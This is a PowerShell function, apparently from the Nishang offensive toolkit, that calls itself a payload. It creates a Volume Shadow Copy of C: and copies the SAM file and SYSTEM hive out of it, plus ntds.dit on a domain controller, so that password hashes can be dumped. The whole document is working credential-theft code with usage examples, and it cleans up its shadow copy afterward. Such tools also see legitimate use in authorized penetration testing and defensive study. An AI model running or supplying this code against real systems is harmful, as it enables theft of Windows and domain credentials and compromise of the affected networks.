function Copy-VSS { <# .SYNOPSIS Nishang Payload which copies the SAM file (and ntds.dit and SYSTEM hive if run on a Domain Controller). .DESCRIPTION This payload uses the VSS service (starts it if not running), creates a shadow of C: and copies the SAM file which could be used to dump password hashes from it. If the script is run on a Domain Controller, ntds.dit and SYSTEM hive are also copied. The script must be run from an elevated shell. The default path used for SAM is C:\Windows\System32\config\SAM, for SYSTEM hive it is C:\Windows\System32\config\SYSTEM and for NTDS.dit it is C:\Windows\system32\ntds.dit. Sometimes the ntds.dit is present in other locations like D:\NTDS or C:\Windows\NTDS and so on. Use $ntdsSource variable to provide the directory. .PARAMETER PATH The path where the files would be saved. It must already exist. .EXAMPLE PS > Copy-VSS Saves the files in current run location of the payload. .Example PS > Copy-VSS -DestinationDir C:\temp Saves the files in C:\temp. .Example PS > Copy-VSS -DestinationDir C:\temp -ntdsSource D:\ntds\ntds.dit .LINK .NOTES Code by @al14s #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $DestinationDir, [Parameter(Position = 1, Mandatory = $False)] [String] $ntdsSource ) $service = (Get-Service -name VSS) if($service.Status -ne "Running") { $notrunning=1 $service.Start() } $id = (Get-WmiObject -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID $volume = (Get-WmiObject win32_shadowcopy -filter "ID='$id'") $SAMpath = "$pwd\SAM" $SYSTEMpath = "$pwd\SYSTEM" $ntdspath = "$pwd\ntds" if ($DestinationDir) { $SAMpath = "$DestinationDir\SAM" $SYSTEMpath = "$DestinationDir\SYSTEM" $ntdspath = "$DestinationDir\ntds" } cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath if($ntdsSource) { cmd /c copy "$($volume.DeviceObject)\$ntdsSource\ntds.dit" $ntdspath } else { cmd /c copy "$($volume.DeviceObject)\windows\system32\ntds.dit" $ntdspath } $volume.Delete() if($notrunning -eq 1) { $service.Stop() } }